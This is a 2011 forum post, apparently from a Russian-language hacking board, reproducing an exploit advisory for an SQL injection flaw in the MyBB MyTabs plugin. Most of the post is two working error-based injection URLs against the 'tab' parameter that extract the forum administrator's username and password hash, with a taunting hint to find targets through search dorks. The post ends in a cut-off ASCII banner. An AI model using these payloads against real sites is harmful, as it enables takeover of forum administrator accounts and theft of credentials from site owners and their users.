03.08.2011, 08:20
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами:
7910966
Репутация:
1
|
|
MyBB MyTabs (plugin) 0day SQL injection vulnerability
[CODE]
================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !
Vulnerability :
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
_ _ ____ _ _ _ _ _ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _
|
|
|